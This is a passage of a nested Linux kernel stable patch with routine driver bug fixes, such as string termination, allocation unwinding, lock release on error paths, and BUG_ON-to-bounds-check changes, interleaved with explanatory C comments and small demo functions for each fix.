+ 	{VPU_MSG_ID_FIRMWARE_XCPT, VID_API_EVENT_FIRMWARE_XCPT},
+ 	{VPU_MSG_ID_PIC_SKIPPED, VID_API_EVENT_PIC_SKIPPED},
++	{VPU_MSG_ID_DBG_MSG, VID_API_EVENT_DBG_MSG_DEC},
+ };
+ 
+ static void vpu_malone_pack_fs_alloc(struct vpu_rpc_event *pkt,
+diff --git a/drivers/media/platform/amphion/vpu_msgs.c b/drivers/media/platform/amphion/vpu_msgs.c
+index d0ead051f7d18..b74a407a19f22 100644
+--- a/drivers/media/platform/amphion/vpu_msgs.c
++++ b/drivers/media/platform/amphion/vpu_msgs.c
+@@ -23,6 +23,7 @@
+ struct vpu_msg_handler {
+ 	u32 id;
+ 	void (*done)(struct vpu_inst *inst, struct vpu_rpc_event *pkt);
++	u32 is_str;
+ };
+ 
+ static void vpu_session_handle_start_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+@@ -154,7 +155,7 @@ static void vpu_session_handle_error(struct vpu_inst *inst, struct vpu_rpc_event
+ {
+ 	char *str = (char *)pkt->data;
+ 
+-	if (strlen(str))
++	if (*str)
+ 		dev_err(inst->dev, "instance %d firmware error : %s\n", inst->id, str);
+ 	else
+ 		dev_err(inst->dev, "instance %d is unsupported stream\n", inst->id);
+@@ -180,6 +181,21 @@ static void vpu_session_handle_pic_skipped(struct vpu_inst *inst, struct vpu_rpc
+ 	vpu_inst_unlock(inst);
+ }
+ 
++static void vpu_session_handle_dbg_msg(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
++{
++	char *str = (char *)pkt->data;
++
++	if (*str)
++		dev_info(inst->dev, "instance %d firmware dbg msg : %s\n", inst->id, str);
++}
++
++static void vpu_terminate_string_msg(struct vpu_rpc_event *pkt)
++{
++	if (pkt->hdr.num == ARRAY_SIZE(pkt->data))
++		pkt->hdr.num--;
++	pkt->data[pkt->hdr.num] = 0;
++}
++
+ static struct vpu_msg_handler handlers[] = {
+ 	{VPU_MSG_ID_START_DONE, vpu_session_handle_start_done},
+ 	{VPU_MSG_ID_STOP_DONE, vpu_session_handle_stop_done},
+@@ -193,9 +209,10 @@ static struct vpu_msg_handler handlers[] = {
+ 	{VPU_MSG_ID_PIC_DECODED, vpu_session_handle_pic_decoded},
+ 	{VPU_MSG_ID_DEC_DONE, vpu_session_handle_pic_done},
+ 	{VPU_MSG_ID_PIC_EOS, vpu_session_handle_eos},
+-	{VPU_MSG_ID_UNSUPPORTED, vpu_session_handle_error},
+-	{VPU_MSG_ID_FIRMWARE_XCPT, vpu_session_handle_firmware_xcpt},
++	{VPU_MSG_ID_UNSUPPORTED, vpu_session_handle_error, true},
++	{VPU_MSG_ID_FIRMWARE_XCPT, vpu_session_handle_firmware_xcpt, true},
+ 	{VPU_MSG_ID_PIC_SKIPPED, vpu_session_handle_pic_skipped},
++	{VPU_MSG_ID_DBG_MSG, vpu_session_handle_dbg_msg, true},
+ };
+ 
+ static int vpu_session_handle_msg(struct vpu_inst *inst, struct vpu_rpc_event *msg)
+@@ -219,8 +236,12 @@ static int vpu_session_handle_msg(struct vpu_inst *inst, struct vpu_rpc_event *m
+ 		}
+ 	}
+ 
+-	if (handler && handler->done)
+-		handler->done(inst, msg);
++	if (handler) {
++		if (handler->is_str)
++			vpu_terminate_string_msg(msg);
++		if (handler->done)
++			handler->done(inst, msg);
++	}
+ 
+ 	vpu_response_cmd(inst, msg_id, 1);
+ 
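/*
 * Editorial aside: firmware-supplied strings in the amphion RPC payload are
 * not guaranteed to be NUL-terminated, so the new vpu_terminate_string_msg()
 * forcibly terminates them (sacrificing the last element when the payload
 * is completely full) before any handler calls strlen() or printk("%s").
 * A hedged sketch of the same idea; note the driver actually indexes 32-bit
 * words of pkt->data, simplified to bytes here, and cap is assumed >= 1:
 */
#include <stddef.h>

static void terminate_string_demo(char *buf, size_t used, size_t cap)
{
	if (used >= cap)	/* full buffer: sacrifice the last byte */
		used = cap - 1;
	buf[used] = '\0';	/* now safe for %s / strlen() */
}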
+diff --git a/drivers/media/platform/cadence/cdns-csi2rx.c b/drivers/media/platform/cadence/cdns-csi2rx.c
+index cc3ebb0d96f66..2a23da6a0b8ee 100644
+--- a/drivers/media/platform/cadence/cdns-csi2rx.c
++++ b/drivers/media/platform/cadence/cdns-csi2rx.c
+@@ -404,8 +404,10 @@ static int csi2rx_parse_dt(struct csi2rx_priv *csi2rx)
+ 	asd = v4l2_async_nf_add_fwnode_remote(&csi2rx->notifier, fwh,
+ 					      struct v4l2_async_subdev);
+ 	of_node_put(ep);
+-	if (IS_ERR(asd))
++	if (IS_ERR(asd)) {
++		v4l2_async_nf_cleanup(&csi2rx->notifier);
+ 		return PTR_ERR(asd);
++	}
+ 
+ 	csi2rx->notifier.ops = &csi2rx_notifier_ops;
+ 
+@@ -467,6 +469,7 @@ static int csi2rx_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_cleanup:
++	v4l2_async_nf_unregister(&csi2rx->notifier);
+ 	v4l2_async_nf_cleanup(&csi2rx->notifier);
+ err_free_priv:
+ 	kfree(csi2rx);
+@@ -477,6 +480,8 @@ static int csi2rx_remove(struct platform_device *pdev)
+ {
+ 	struct csi2rx_priv *csi2rx = platform_get_drvdata(pdev);
+ 
++	v4l2_async_nf_unregister(&csi2rx->notifier);
++	v4l2_async_nf_cleanup(&csi2rx->notifier);
+ 	v4l2_async_unregister_subdev(&csi2rx->subdev);
+ 	kfree(csi2rx);
+ 
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+index 1cf037bf72dda..8c271c38caf73 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+@@ -98,6 +98,7 @@ void mtk_jpeg_set_enc_params(struct mtk_jpeg_ctx *ctx,  void __iomem *base)
+ 	u32 img_stride;
+ 	u32 mem_stride;
+ 	u32 i, enc_quality;
++	u32 nr_enc_quality = ARRAY_SIZE(mtk_jpeg_enc_quality);
+ 
+ 	value = width << 16 | height;
+ 	writel(value, base + JPEG_ENC_IMG_SIZE);
+@@ -128,8 +129,8 @@ void mtk_jpeg_set_enc_params(struct mtk_jpeg_ctx *ctx,  void __iomem *base)
+ 	writel(img_stride, base + JPEG_ENC_IMG_STRIDE);
+ 	writel(mem_stride, base + JPEG_ENC_STRIDE);
+ 
+-	enc_quality = mtk_jpeg_enc_quality[0].hardware_value;
+-	for (i = 0; i < ARRAY_SIZE(mtk_jpeg_enc_quality); i++) {
++	enc_quality = mtk_jpeg_enc_quality[nr_enc_quality - 1].hardware_value;
++	for (i = 0; i < nr_enc_quality; i++) {
+ 		if (ctx->enc_quality <= mtk_jpeg_enc_quality[i].quality_param) {
+ 			enc_quality = mtk_jpeg_enc_quality[i].hardware_value;
+ 			break;
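/*
 * Editorial aside: the mtk_jpeg lookup above scans a quality table ordered
 * by ascending quality_param and picks the first entry covering the
 * requested quality; the fix changes the fallback (requested quality above
 * every table entry) from the lowest entry to the highest one. A hedged
 * sketch with an illustrative table type:
 */
struct quality_map_demo {
	unsigned int quality_param;	/* upper bound of this bucket */
	unsigned int hardware_value;
};

static unsigned int pick_quality_demo(const struct quality_map_demo *tbl,
				      unsigned int n, unsigned int wanted)
{
	unsigned int i, hw = tbl[n - 1].hardware_value;	/* fallback: best */

	for (i = 0; i < n; i++) {
		if (wanted <= tbl[i].quality_param) {
			hw = tbl[i].hardware_value;
			break;
		}
	}
	return hw;
}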
+diff --git a/drivers/media/platform/samsung/s3c-camif/camif-capture.c b/drivers/media/platform/samsung/s3c-camif/camif-capture.c
+index db106ebdf870a..bca3cae4dd8bb 100644
+--- a/drivers/media/platform/samsung/s3c-camif/camif-capture.c
++++ b/drivers/media/platform/samsung/s3c-camif/camif-capture.c
+@@ -1132,12 +1132,12 @@ int s3c_camif_register_video_node(struct camif_dev *camif, int idx)
+ 
+ 	ret = vb2_queue_init(q);
+ 	if (ret)
+-		goto err_vd_rel;
++		return ret;
+ 
+ 	vp->pad.flags = MEDIA_PAD_FL_SINK;
+ 	ret = media_entity_pads_init(&vfd->entity, 1, &vp->pad);
+ 	if (ret)
+-		goto err_vd_rel;
++		return ret;
+ 
+ 	video_set_drvdata(vfd, vp);
+ 
+@@ -1170,8 +1170,6 @@ err_ctrlh_free:
+ 	v4l2_ctrl_handler_free(&vp->ctrl_handler);
+ err_me_cleanup:
+ 	media_entity_cleanup(&vfd->entity);
+-err_vd_rel:
+-	video_device_release(vfd);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/media/platform/verisilicon/hantro_drv.c b/drivers/media/platform/verisilicon/hantro_drv.c
+index 8cb4a68c9119e..08840ba313e7a 100644
+--- a/drivers/media/platform/verisilicon/hantro_drv.c
++++ b/drivers/media/platform/verisilicon/hantro_drv.c
+@@ -125,7 +125,8 @@ void hantro_watchdog(struct work_struct *work)
+ 	ctx = v4l2_m2m_get_curr_priv(vpu->m2m_dev);
+ 	if (ctx) {
+ 		vpu_err("frame processing timed out!\n");
+-		ctx->codec_ops->reset(ctx);
++		if (ctx->codec_ops->reset)
++			ctx->codec_ops->reset(ctx);
+ 		hantro_job_finish(vpu, ctx, VB2_BUF_STATE_ERROR);
+ 	}
+ }
+diff --git a/drivers/media/platform/verisilicon/hantro_postproc.c b/drivers/media/platform/verisilicon/hantro_postproc.c
+index 09d8cf9426895..708095cf09fe2 100644
+--- a/drivers/media/platform/verisilicon/hantro_postproc.c
++++ b/drivers/media/platform/verisilicon/hantro_postproc.c
+@@ -103,7 +103,7 @@ static void hantro_postproc_g1_enable(struct hantro_ctx *ctx)
+ 
+ static int down_scale_factor(struct hantro_ctx *ctx)
+ {
+-	if (ctx->src_fmt.width == ctx->dst_fmt.width)
++	if (ctx->src_fmt.width <= ctx->dst_fmt.width)
+ 		return 0;
+ 
+ 	return DIV_ROUND_CLOSEST(ctx->src_fmt.width, ctx->dst_fmt.width);
+diff --git a/drivers/media/test-drivers/vidtv/vidtv_mux.c b/drivers/media/test-drivers/vidtv/vidtv_mux.c
+index b51e6a3b8cbeb..f99878eff7ace 100644
+--- a/drivers/media/test-drivers/vidtv/vidtv_mux.c
++++ b/drivers/media/test-drivers/vidtv/vidtv_mux.c
+@@ -504,13 +504,16 @@ struct vidtv_mux *vidtv_mux_init(struct dvb_frontend *fe,
+ 	m->priv = args->priv;
+ 	m->network_id = args->network_id;
+ 	m->network_name = kstrdup(args->network_name, GFP_KERNEL);
++	if (!m->network_name)
++		goto free_mux_buf;
++
+ 	m->timing.current_jiffies = get_jiffies_64();
+ 
+ 	if (args->channels)
+ 		m->channels = args->channels;
+ 	else
+ 		if (vidtv_channels_init(m) < 0)
+-			goto free_mux_buf;
++			goto free_mux_network_name;
+ 
+ 	/* will alloc data for pmt_sections after initializing pat */
+ 	if (vidtv_channel_si_init(m) < 0)
+@@ -527,6 +530,8 @@ free_channel_si:
+ 	vidtv_channel_si_destroy(m);
+ free_channels:
+ 	vidtv_channels_destroy(m);
++free_mux_network_name:
++	kfree(m->network_name);
+ free_mux_buf:
+ 	vfree(m->mux_buf);
+ free_mux:
+diff --git a/drivers/media/test-drivers/vidtv/vidtv_psi.c b/drivers/media/test-drivers/vidtv/vidtv_psi.c
+index a5875380ef407..c45828bc5b278 100644
+--- a/drivers/media/test-drivers/vidtv/vidtv_psi.c
++++ b/drivers/media/test-drivers/vidtv/vidtv_psi.c
+@@ -301,16 +301,29 @@ struct vidtv_psi_desc_service *vidtv_psi_service_desc_init(struct vidtv_psi_desc
+ 
+ 	desc->service_name_len = service_name_len;
+ 
+-	if (service_name && service_name_len)
++	if (service_name && service_name_len) {
+ 		desc->service_name = kstrdup(service_name, GFP_KERNEL);
++		if (!desc->service_name)
++			goto free_desc;
++	}
+ 
+ 	desc->provider_name_len = provider_name_len;
+ 
+-	if (provider_name && provider_name_len)
++	if (provider_name && provider_name_len) {
+ 		desc->provider_name = kstrdup(provider_name, GFP_KERNEL);
++		if (!desc->provider_name)
++			goto free_desc_service_name;
++	}
+ 
+ 	vidtv_psi_desc_chain(head, (struct vidtv_psi_desc *)desc);
+ 	return desc;
++
++free_desc_service_name:
++	if (service_name && service_name_len)
++		kfree(desc->service_name);
++free_desc:
++	kfree(desc);
++	return NULL;
+ }
+ 
+ struct vidtv_psi_desc_registration
+@@ -355,8 +368,13 @@ struct vidtv_psi_desc_network_name
+ 
+ 	desc->length = network_name_len;
+ 
+-	if (network_name && network_name_len)
++	if (network_name && network_name_len) {
+ 		desc->network_name = kstrdup(network_name, GFP_KERNEL);
++		if (!desc->network_name) {
++			kfree(desc);
++			return NULL;
++		}
++	}
+ 
+ 	vidtv_psi_desc_chain(head, (struct vidtv_psi_desc *)desc);
+ 	return desc;
+@@ -442,15 +460,32 @@ struct vidtv_psi_desc_short_event
+ 		iso_language_code = "eng";
+ 
+ 	desc->iso_language_code = kstrdup(iso_language_code, GFP_KERNEL);
++	if (!desc->iso_language_code)
++		goto free_desc;
+ 
+-	if (event_name && event_name_len)
++	if (event_name && event_name_len) {
+ 		desc->event_name = kstrdup(event_name, GFP_KERNEL);
++		if (!desc->event_name)
++			goto free_desc_language_code;
++	}
+ 
+-	if (text && text_len)
++	if (text && text_len) {
+ 		desc->text = kstrdup(text, GFP_KERNEL);
++		if (!desc->text)
++			goto free_desc_event_name;
++	}
+ 
+ 	vidtv_psi_desc_chain(head, (struct vidtv_psi_desc *)desc);
+ 	return desc;
++
++free_desc_event_name:
++	if (event_name && event_name_len)
++		kfree(desc->event_name);
++free_desc_language_code:
++	kfree(desc->iso_language_code);
++free_desc:
++	kfree(desc);
++	return NULL;
+ }
+ 
+ struct vidtv_psi_desc *vidtv_psi_desc_clone(struct vidtv_psi_desc *desc)
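/*
 * Editorial aside: the vidtv hunks above add the missing NULL checks for
 * every kstrdup() and unwind earlier allocations on failure. A hedged,
 * self-contained sketch of the goto-unwind idiom (kfree(NULL) is a no-op
 * in the kernel, which keeps the labels simple); the struct and function
 * names are illustrative:
 */
#include <linux/slab.h>
#include <linux/string.h>

struct two_names_demo {
	char *first;
	char *second;
};

static struct two_names_demo *two_names_alloc_demo(const char *a, const char *b)
{
	struct two_names_demo *d = kzalloc(sizeof(*d), GFP_KERNEL);

	if (!d)
		return NULL;
	d->first = kstrdup(a, GFP_KERNEL);
	if (!d->first)
		goto free_d;
	d->second = kstrdup(b, GFP_KERNEL);
	if (!d->second)
		goto free_first;
	return d;

free_first:
	kfree(d->first);
free_d:
	kfree(d);
	return NULL;
}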
+diff --git a/drivers/media/usb/dvb-usb-v2/af9035.c b/drivers/media/usb/dvb-usb-v2/af9035.c
+index cd6f5374414d4..5f9dec71ff6e0 100644
+--- a/drivers/media/usb/dvb-usb-v2/af9035.c
++++ b/drivers/media/usb/dvb-usb-v2/af9035.c
+@@ -323,8 +323,10 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
+-			if (msg[0].len < 3 || msg[1].len < 1)
+-				return -EOPNOTSUPP;
++			if (msg[0].len < 3 || msg[1].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto unlock;
++			}
+ 			/* demod access via firmware interface */
+ 			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+@@ -384,8 +386,10 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
+-			if (msg[0].len < 3)
+-				return -EOPNOTSUPP;
++			if (msg[0].len < 3) {
++				ret = -EOPNOTSUPP;
++				goto unlock;
++			}
+ 			/* demod access via firmware interface */
+ 			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+@@ -460,6 +464,7 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 		ret = -EOPNOTSUPP;
+ 	}
+ 
++unlock:
+ 	mutex_unlock(&d->i2c_mutex);
+ 
+ 	if (ret < 0)
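/*
 * Editorial aside: the af9035 bug fixed above was an early
 * "return -EOPNOTSUPP" while d->i2c_mutex was still held; the fix funnels
 * every exit through a single "unlock" label. A hedged sketch of the idiom:
 */
#include <linux/errno.h>
#include <linux/mutex.h>

static int locked_op_demo(struct mutex *lock, int arg)
{
	int ret = 0;

	mutex_lock(lock);
	if (arg < 0) {
		ret = -EOPNOTSUPP;	/* was: return -EOPNOTSUPP, leaking the lock */
		goto unlock;
	}
	/* ... the actual transfer would happen here ... */
unlock:
	mutex_unlock(lock);
	return ret;
}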
+diff --git a/drivers/mfd/arizona-spi.c b/drivers/mfd/arizona-spi.c
+index 5c4af05ed0440..3f83a77ce69e7 100644
+--- a/drivers/mfd/arizona-spi.c
++++ b/drivers/mfd/arizona-spi.c
+@@ -159,6 +159,9 @@ static int arizona_spi_acpi_probe(struct arizona *arizona)
+ 	arizona->pdata.micd_ranges = arizona_micd_aosp_ranges;
+ 	arizona->pdata.num_micd_ranges = ARRAY_SIZE(arizona_micd_aosp_ranges);
+ 
++	/* Use left headphone speaker for HP vs line-out detection */
++	arizona->pdata.hpdet_channel = ARIZONA_ACCDET_MODE_HPL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/mfd/dln2.c b/drivers/mfd/dln2.c
+index c3149729cec2e..6cd0b0c752d6e 100644
+--- a/drivers/mfd/dln2.c
++++ b/drivers/mfd/dln2.c
+@@ -827,7 +827,6 @@ out_stop_rx:
+ 	dln2_stop_rx_urbs(dln2);
+ 
+ out_free:
+-	usb_put_dev(dln2->usb_dev);
+ 	dln2_free(dln2);
+ 
+ 	return ret;
+diff --git a/drivers/mfd/mfd-core.c b/drivers/mfd/mfd-core.c
+index 16d1861e96823..97909e3e2c303 100644
+--- a/drivers/mfd/mfd-core.c
++++ b/drivers/mfd/mfd-core.c
+@@ -176,6 +176,7 @@ static int mfd_add_device(struct device *parent, int id,
+ 	struct platform_device *pdev;
+ 	struct device_node *np = NULL;
+ 	struct mfd_of_node_entry *of_entry, *tmp;
++	bool disabled = false;
+ 	int ret = -ENOMEM;
+ 	int platform_id;
+ 	int r;
+@@ -213,11 +214,10 @@ static int mfd_add_device(struct device *parent, int id,
+ 	if (IS_ENABLED(CONFIG_OF) && parent->of_node && cell->of_compatible) {
+ 		for_each_child_of_node(parent->of_node, np) {
+ 			if (of_device_is_compatible(np, cell->of_compatible)) {
+-				/* Ignore 'disabled' devices error free */
++				/* Skip 'disabled' devices */
+ 				if (!of_device_is_available(np)) {
+-					of_node_put(np);
+-					ret = 0;
+-					goto fail_alias;
++					disabled = true;
++					continue;
+ 				}
+ 
+ 				ret = mfd_match_of_node_to_dev(pdev, np, cell);
+@@ -227,10 +227,17 @@ static int mfd_add_device(struct device *parent, int id,
+ 				if (ret)
+ 					goto fail_alias;
+ 
+-				break;
++				goto match;
+ 			}
+ 		}
+ 
++		if (disabled) {
++			/* Ignore 'disabled' devices error free */
++			ret = 0;
++			goto fail_alias;
++		}
++
++match:
+ 		if (!pdev->dev.of_node)
+ 			pr_warn("%s: Failed to locate of_node [id: %d]\n",
+ 				cell->name, platform_id);
+diff --git a/drivers/misc/ti-st/st_core.c b/drivers/misc/ti-st/st_core.c
+index 7f6976a9f508b..48e0f8377e659 100644
+--- a/drivers/misc/ti-st/st_core.c
++++ b/drivers/misc/ti-st/st_core.c
+@@ -15,6 +15,7 @@
+ #include <linux/skbuff.h>
+ 
+ #include <linux/ti_wilink_st.h>
++#include <linux/netdevice.h>
+ 
+ extern void st_kim_recv(void *, const unsigned char *, long);
+ void st_int_recv(void *, const unsigned char *, long);
+@@ -435,7 +436,7 @@ static void st_int_enqueue(struct st_data_s *st_gdata, struct sk_buff *skb)
+ 	case ST_LL_AWAKE_TO_ASLEEP:
+ 		pr_err("ST LL is illegal state(%ld),"
+ 			   "purging received skb.", st_ll_getstate(st_gdata));
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	case ST_LL_ASLEEP:
+ 		skb_queue_tail(&st_gdata->tx_waitq, skb);
+@@ -444,7 +445,7 @@ static void st_int_enqueue(struct st_data_s *st_gdata, struct sk_buff *skb)
+ 	default:
+ 		pr_err("ST LL is illegal state(%ld),"
+ 			   "purging received skb.", st_ll_getstate(st_gdata));
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	}
+ 
+@@ -498,7 +499,7 @@ void st_tx_wakeup(struct st_data_s *st_data)
+ 				spin_unlock_irqrestore(&st_data->lock, flags);
+ 				break;
+ 			}
+-			kfree_skb(skb);
++			dev_kfree_skb_irq(skb);
+ 			spin_unlock_irqrestore(&st_data->lock, flags);
+ 		}
+ 		/* if wake-up is set in another context- restart sending */
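/*
 * Editorial aside: the st_core paths above run under spin_lock_irqsave()
 * (potentially in hard-IRQ context), where plain kfree_skb() is not safe;
 * the fix swaps in dev_kfree_skb_irq(), which queues the skb for freeing
 * in softirq context instead. A hedged sketch of the fixed shape:
 */
#include <linux/netdevice.h>
#include <linux/skbuff.h>
#include <linux/spinlock.h>

static void drop_skb_atomic_demo(spinlock_t *lock, struct sk_buff *skb)
{
	unsigned long flags;

	spin_lock_irqsave(lock, flags);
	/* ... decide the skb cannot be sent ... */
	dev_kfree_skb_irq(skb);	/* safe here; kfree_skb() would not be */
	spin_unlock_irqrestore(lock, flags);
}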
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 4a4bab9aa7263..89cd48fcec79f 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -104,7 +104,7 @@ static int mmc_decode_cid(struct mmc_card *card)
+ 	case 3: /* MMC v3.1 - v3.3 */
+ 	case 4: /* MMC v4 */
+ 		card->cid.manfid	= UNSTUFF_BITS(resp, 120, 8);
+-		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 8);
++		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 16);
+ 		card->cid.prod_name[0]	= UNSTUFF_BITS(resp, 96, 8);
+ 		card->cid.prod_name[1]	= UNSTUFF_BITS(resp, 88, 8);
+ 		card->cid.prod_name[2]	= UNSTUFF_BITS(resp, 80, 8);
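/*
 * Editorial aside: the mmc fix above widens the extracted OEM ID from 8 to
 * 16 bits (CID bits 104..119), so CID-based matching sees the full field.
 * A hedged re-statement of the kernel's UNSTUFF_BITS() extraction over the
 * 128-bit response stored as four u32 words (resp[0] holds bits 127..96);
 * the function name is illustrative:
 */
#include <linux/types.h>

static u32 unstuff_bits_demo(const u32 *resp, int start, int size)
{
	const u32 mask = (size < 32 ? 1u << size : 0) - 1;
	const int off = 3 - (start / 32);
	const int shft = start & 31;
	u32 res = resp[off] >> shft;

	if (size + shft > 32)	/* field straddles a word boundary */
		res |= resp[off - 1] << ((32 - shft) % 32);
	return res & mask;
}

/* oemid: unstuff_bits_demo(resp, 104, 16) == resp[0] bits 8..23 */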
+diff --git a/drivers/net/can/dev/dev.c b/drivers/net/can/dev/dev.c
+index c1956b1e9faf7..f685479eda1be 100644
+--- a/drivers/net/can/dev/dev.c
++++ b/drivers/net/can/dev/dev.c
+@@ -132,7 +132,8 @@ static void can_restart(struct net_device *dev)
+ 	struct can_frame *cf;
+ 	int err;
+ 
+-	BUG_ON(netif_carrier_ok(dev));
++	if (netif_carrier_ok(dev))
++		netdev_err(dev, "Attempt to restart for bus-off recovery, but carrier is OK?\n");
+ 
+ 	/* No synchronization needed because the device is bus-off and
+ 	 * no messages can come in or go out.
+@@ -153,11 +154,12 @@ restart:
+ 	priv->can_stats.restarts++;
+ 
+ 	/* Now restart the device */
+-	err = priv->do_set_mode(dev, CAN_MODE_START);
+-
+ 	netif_carrier_on(dev);
+-	if (err)
++	err = priv->do_set_mode(dev, CAN_MODE_START);
++	if (err) {
+ 		netdev_err(dev, "Error %d during restart", err);
++		netif_carrier_off(dev);
++	}
+ }
+ 
+ static void can_restart_work(struct work_struct *work)
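/*
 * Editorial aside: the can_restart() reordering above brings the carrier
 * up before the controller is restarted, so the device never handles
 * traffic while carrier is still reported off, and rolls the carrier back
 * if the restart fails; the BUG_ON() is also downgraded to a diagnostic so
 * a bogus restart request no longer crashes the machine. A hedged skeleton
 * of the ordering:
 */
#include <linux/netdevice.h>

static int restart_demo(struct net_device *dev,
			int (*set_mode)(struct net_device *, int),
			int mode_start)
{
	int err;

	netif_carrier_on(dev);			/* first: carrier up */
	err = set_mode(dev, mode_start);	/* then: restart controller */
	if (err)
		netif_carrier_off(dev);		/* roll back on failure */
	return err;
}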
+diff --git a/drivers/net/can/dev/skb.c b/drivers/net/can/dev/skb.c
+index f6d05b3ef59ab..3ebd4f779b9bd 100644
+--- a/drivers/net/can/dev/skb.c
++++ b/drivers/net/can/dev/skb.c
+@@ -49,7 +49,11 @@ int can_put_echo_skb(struct sk_buff *skb, struct net_device *dev,
+ {
+ 	struct can_priv *priv = netdev_priv(dev);
+ 
+-	BUG_ON(idx >= priv->echo_skb_max);
++	if (idx >= priv->echo_skb_max) {
++		netdev_err(dev, "%s: BUG! Trying to access can_priv::echo_skb out of bounds (%u/max %u)\n",
++			   __func__, idx, priv->echo_skb_max);
++		return -EINVAL;
++	}
+ 
+ 	/* check flag whether this packet has to be looped back */
+ 	if (!(dev->flags & IFF_ECHO) ||
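/*
 * Editorial aside: as in can_restart(), a driver-triggerable BUG_ON() in
 * can_put_echo_skb() becomes a graceful bounds check -- an out-of-range
 * echo index now logs and returns -EINVAL instead of panicking. A hedged
 * sketch of the pattern:
 */
#include <linux/errno.h>

static int bounded_access_demo(unsigned int idx, unsigned int max)
{
	if (idx >= max)
		return -EINVAL;	/* was: BUG_ON(idx >= max) */
	/* ... safe to index the echo_skb array here ... */
	return 0;
}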
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index 9609041016776..85570e40c8e9b 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -18086,7 +18086,8 @@ static void tg3_shutdown(struct pci_dev *pdev)
+ 	if (netif_running(dev))
+ 		dev_close(dev);
+ 
+-	tg3_power_down(tp);
++	if (system_state == SYSTEM_POWER_OFF)
++		tg3_power_down(tp);
+ 
+ 	rtnl_unlock();
+ 
+diff --git a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+index 7750702900fa6..6f6525983130e 100644
+--- a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
++++ b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+@@ -2259,7 +2259,7 @@ static void chtls_rx_ack(struct sock *sk, struct sk_buff *skb)
+ 
+ 		if (tp->snd_una != snd_una) {
+ 			tp->snd_una = snd_una;
+-			tp->rcv_tstamp = tcp_time_stamp(tp);
++			tp->rcv_tstamp = tcp_jiffies32;
+ 			if (tp->snd_una == tp->snd_nxt &&
+ 			    !csk_flag_nochk(csk, CSK_TX_FAILOVER))
+ 				csk_reset_flag(csk, CSK_TX_WAIT_IDLE);
+diff --git a/drivers/net/ethernet/google/gve/gve_main.c b/drivers/net/ethernet/google/gve/gve_main.c
+index 2e5e0a8872704..d3f6ad586ba1b 100644
+--- a/drivers/net/ethernet/google/gve/gve_main.c
++++ b/drivers/net/ethernet/google/gve/gve_main.c
+@@ -139,7 +139,7 @@ static int gve_alloc_stats_report(struct gve_priv *priv)
+ 	rx_stats_num = (GVE_RX_STATS_REPORT_NUM + NIC_RX_STATS_REPORT_NUM) *
+ 		       priv->rx_cfg.num_queues;
+ 	priv->stats_report_len = struct_size(priv->stats_report, stats,
+-					     tx_stats_num + rx_stats_num);
++					     size_add(tx_stats_num, rx_stats_num));
+ 	priv->stats_report =
+ 		dma_alloc_coherent(&priv->pdev->dev, priv->stats_report_len,
+ 				   &priv->stats_report_bus, GFP_KERNEL);
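/*
 * Editorial aside: tx_stats_num + rx_stats_num feeds struct_size() above,
 * and an unchecked addition there could wrap; size_add() (from
 * <linux/overflow.h>) saturates to SIZE_MAX on overflow, making the
 * subsequent allocation fail cleanly instead of under-allocating. A hedged
 * sketch of saturating size arithmetic; the helper name is illustrative:
 */
#include <linux/overflow.h>

static size_t report_len_demo(size_t tx_stats_num, size_t rx_stats_num,
			      size_t entry_size, size_t header_size)
{
	/* any intermediate overflow yields SIZE_MAX */
	return size_add(header_size,
			size_mul(entry_size,
				 size_add(tx_stats_num, rx_stats_num)));
}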
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 08ccf0024ce1a..68ee2c59692d1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -16283,11 +16283,15 @@ static void i40e_remove(struct pci_dev *pdev)
+ 			i40e_switch_branch_release(pf->veb[i]);
+ 	}
+ 
+-	/* Now we can shutdown the PF's VSI, just before we kill
++	/* Now we can shutdown the PF's VSIs, just before we kill
+ 	 * adminq and hmc.
+ 	 */
+-	if (pf->vsi[pf->lan_vsi])
+-		i40e_vsi_release(pf->vsi[pf->lan_vsi]);
++	for (i = pf->num_alloc_vsi; i--;)
++		if (pf->vsi[i]) {
++			i40e_vsi_close(pf->vsi[i]);
++			i40e_vsi_release(pf->vsi[i]);
++			pf->vsi[i] = NULL;
++		}
